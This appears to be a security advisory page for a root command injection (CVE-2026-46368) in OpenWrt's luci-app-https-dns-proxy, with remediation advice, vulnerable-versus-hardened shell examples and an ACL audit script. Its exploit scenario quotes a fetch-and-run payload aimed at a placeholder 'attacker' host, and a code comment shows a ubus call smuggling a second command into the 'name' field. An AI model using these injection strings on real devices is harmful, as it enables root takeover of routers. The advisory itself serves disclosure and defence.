
luci-app-https-dns-proxy CVE-2026-46368

EUVD-2026-31836 · GHSA-crmc-hfvp-6m66 · HIGH
Command Injection (CWE-77)
Published 2026-05-26 · VulnCheck
CVSS 4.0 base score 8.7 (NVD)

Severity by source

NVD (primary; only source for this CVE): 8.7 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
(threat, environmental and supplemental metrics all Not Defined: E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X)

Base metrics (NVD)
Attack Vector: Network
Attack Complexity: Low
Attack Requirements: None
Privileges Required: Low
User Interaction: None
Vulnerable System Confidentiality / Integrity / Availability: High / High / High
Subsequent System Confidentiality / Integrity / Availability: None / None / None
(CVSS 4.0 has no Scope metric; the CVSS 3.x Scope concept is replaced by the Subsequent System impact metrics above, which NVD rates None here.)

Lifecycle Timeline

Jun 08, 2026 10:02 · vuln.today · Analysis generated
May 26, 2026 15:22 · NVD · CVSS changed: 8.8 (HIGH) → 8.7 (HIGH)

Description (CVE.org)

luci-app-https-dns-proxy through 2025.12.29-5 - an optional LuCI web UI add-on for the https-dns-proxy package, distributed through the OpenWrt community packages feed and not installed by default - contains a command injection vulnerability in the setInitAction function. An authenticated user holding the luci.https-dns-proxy ACL permission can inject shell metacharacters through the 'name' parameter of a ubus RPC call to luci.https-dns-proxy setInitAction, resulting in arbitrary command execution as root on the underlying device. Core OpenWrt is not affected; only installations that have opted in to the luci-app-https-dns-proxy package are vulnerable.

Analysis (AI)

Authenticated command injection in luci-app-https-dns-proxy through version 2025.12.29-5 allows a low-privileged LuCI user holding the luci.https-dns-proxy ACL permission to execute arbitrary commands as root on OpenWrt devices via shell metacharacters in the 'name' parameter of a ubus RPC call to setInitAction. Publicly available exploit code exists (Exploit-DB 52521, VulnCheck advisory), though EPSS remains low at 0.06% and the package is an optional community add-on not installed by default. …


Attack Chain (AI derived)

Hypothetical attack flow derived from CVE metadata

Access
Obtain LuCI credentials for a role holding the luci.https-dns-proxy ACL
Delivery
Reach the LuCI/ubus endpoint over the network
Exploit
Send a ubus RPC call to luci.https-dns-proxy setInitAction with a malicious 'name'
Execution
Shell metacharacters in 'name' are injected into the init command, which runs as root
Persist
Install persistence on the device
Impact
Intercept traffic and pivot into the LAN

Vulnerability Assessment (AI)

Exploitation: Requires (1) the optional luci-app-https-dns-proxy package from the OpenWrt community feed to be installed (it is not present in default OpenWrt builds); (2) the LuCI web interface and ubus RPC endpoint to be reachable from the attacker's network position (typically LAN by default, WAN only if the administrator has explicitly exposed it); and (3) valid LuCI credentials whose role grants the luci.https-dns-proxy ACL permission, consistent with CVSS PR:L. …
Risk Assessment: The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H) yields 8.7: network-reachable, low complexity, requiring low privileges (an authenticated LuCI user with the specific ACL), no user interaction, with total confidentiality, integrity, and availability impact on the vulnerable component. …
Exploit Scenario: An attacker who has obtained a low-privileged LuCI account with the luci.https-dns-proxy ACL (for example, a delegated network operator, a guest admin on a shared router, or credentials harvested via phishing or reuse) connects to the LuCI web interface and issues a ubus RPC call to luci.https-dns-proxy setInitAction with a 'name' parameter containing shell metacharacters such as `;wget http://attacker/x -O- | sh;`. The ubus handler concatenates the value into a shell invocation, and the injected command executes as root, giving the attacker full control of the OpenWrt device including persistence, traffic interception, and lateral pivot into the LAN. …
Remediation: Upstream fix available via the project repository at https://github.com/stangri/luci-app-https-dns-proxy; a released patched version newer than 2025.12.29-5 is not independently confirmed from the provided data, so administrators should pull the latest release from the community feed (opkg update && opkg upgrade luci-app-https-dns-proxy, or the apk equivalents on OpenWrt builds that ship apk instead of opkg) once a tagged build above 2025.12.29-5 is published, and verify against the VulnCheck advisory at https://www.vulncheck.com/advisories/luci-app-https-dns-proxy-authenticated-command-injection-via-setinitaction. Until a fixed build is installed, two compensating controls follow directly from the conditions above: remove the luci.https-dns-proxy ACL grant from every LuCI login that does not strictly need it, and, where the web UI for this service is not required, uninstall luci-app-https-dns-proxy itself (the https-dns-proxy package it manages is not named as affected and does not depend on the UI package). …
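The exploit scenario above turns on one detail: the handler hands the caller's 'name' to a shell that re-parses it. The sh fragment below is an added illustration written for this page, not the rpcd backend of luci-app-https-dns-proxy. It shows a setInitAction-style function in that vulnerable shape beside a hardened one. Only the 'name' parameter comes from the advisory; the 'action' parameter, the function names, INIT_DIR and the single allowlisted service name are assumptions made for the example.

```sh
#!/bin/sh
# Added example, not the project's code. Assumed layout: init scripts live
# under INIT_DIR (default /etc/init.d) and the handler receives the RPC
# arguments 'name' and 'action' as positional parameters.
INIT_DIR="${INIT_DIR:-/etc/init.d}"

# Vulnerable shape: 'name' is spliced into a command string that a second
# shell parses, so ';', '|', '$(...)' and '#' inside it are honoured.
# A caller could send, via ubus (the 'action' key is an assumption):
#   ubus call luci.https-dns-proxy setInitAction \
#       '{"name":"https-dns-proxy; id > /tmp/pwned #","action":"start"}'
vulnerable_set_init_action() {
    name="$1"; action="$2"
    sh -c "$INIT_DIR/$name $action 2>/dev/null"
}

# Hardened version:
#  1. 'name' must be exactly the one service this app manages (an allowlist,
#     not a blocklist of metacharacters) and 'action' one of a fixed set;
#  2. the init script is invoked directly with separate argv words, so the
#     values are never re-parsed by a shell.
hardened_set_init_action() {
    name="$1"; action="$2"
    case "$name" in
        https-dns-proxy) ;;
        *) echo "setInitAction: rejected name" >&2; return 2 ;;
    esac
    case "$action" in
        start|stop|restart|reload|enable|disable) ;;
        *) echo "setInitAction: rejected action" >&2; return 2 ;;
    esac
    [ -x "$INIT_DIR/$name" ] || { echo "setInitAction: no init script" >&2; return 3; }
    "$INIT_DIR/$name" "$action"
}
```

Called as `hardened_set_init_action https-dns-proxy restart` the hardened version runs exactly `/etc/init.d/https-dns-proxy restart`; anything else in 'name' or 'action' is refused with a non-zero status before any process is spawned. Stripping or escaping individual metacharacters is not an adequate substitute: the service name set is known and tiny, so the check should be an exact match.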

Recommended Action (AI)

Within 24 hours: Inventory all OpenWrt deployments to identify systems with luci-app-https-dns-proxy installed and determine which users hold the luci.https-dns-proxy ACL permission. …
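For the second half of that inventory step, here is an added audit helper (not from the page or the project) that reads an rpcd ACL directory and an rpcd login config in the stock OpenWrt layout and prints the logins whose write list covers an ACL group granting setInitAction on the ubus object luci.https-dns-proxy. The directory and file layout (/usr/share/rpcd/acl.d/*.json, /etc/config/rpcd), the function names and the line-oriented parsing are assumptions; it is an approximation of the JSON and UCI formats that is adequate for the stock files, not a full parser.

```sh
#!/bin/sh
# Added audit helper; not part of luci-app-https-dns-proxy or the advisory.
# Assumptions: ACL files look like the stock /usr/share/rpcd/acl.d/*.json
# (one group per file, "read"/"write" sections at group level) and logins
# are UCI "config login" stanzas as in /etc/config/rpcd.

# Print the ACL group name of every file that lists "setInitAction" for the
# ubus object "luci.https-dns-proxy" inside its "write" section.
acl_groups_granting_setinitaction() {
    acl_dir="$1"
    for f in "$acl_dir"/*.json; do
        [ -f "$f" ] || continue
        awk '
            # first  "key": {  in the file is the ACL group name
            /^[[:space:]]*"[^"]+"[[:space:]]*:[[:space:]]*\{/ && group == "" {
                g = $0; sub(/^[[:space:]]*"/, "", g); sub(/".*/, "", g); group = g
            }
            /"write"[[:space:]]*:/ { in_write = 1; obj = 0 }
            /"read"[[:space:]]*:/  { in_write = 0; obj = 0 }
            in_write && /"luci\.https-dns-proxy"/ { obj = 1 }
            in_write && obj && /"setInitAction"/ { print group; exit }
        ' "$f"
    done
}

# Print the username of every "config login" stanza whose write list contains
# "*" or one of the ACL groups passed as further arguments.
logins_with_write_access() {
    rpcd_cfg="$1"; shift
    awk -v q="'" -v groups="$*" '
        BEGIN { n = split(groups, G, " ") }
        function flush() { if (user != "" && hit) print user; user = ""; hit = 0 }
        /^config[[:space:]]+login/ { flush() }
        /^[[:space:]]*option[[:space:]]+username/ { u = $3; gsub(q, "", u); user = u }
        /^[[:space:]]*list[[:space:]]+write/ {
            w = $3; gsub(q, "", w)
            if (w == "*") hit = 1
            for (i = 1; i <= n; i++) if (w == G[i]) hit = 1
        }
        END { flush() }
    ' "$rpcd_cfg"
}

# Which logins on this device can invoke setInitAction on luci.https-dns-proxy?
# Returns 1 when no installed ACL grants it (the add-on's ACL is not present).
audit_setinitaction_access() {
    groups=$(acl_groups_granting_setinitaction "$1" | sort -u)
    [ -n "$groups" ] || return 1
    logins_with_write_access "$2" $groups
}
```

On a device you would run `audit_setinitaction_access /usr/share/rpcd/acl.d /etc/config/rpcd`; an empty result with status 1 means the add-on's ACL is not installed, and every username printed is an account that can reach the vulnerable method. The check only covers logins defined in /etc/config/rpcd, which is where LuCI accounts live; pair it with the package manager's installed-package list to confirm whether luci-app-https-dns-proxy is present at all.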

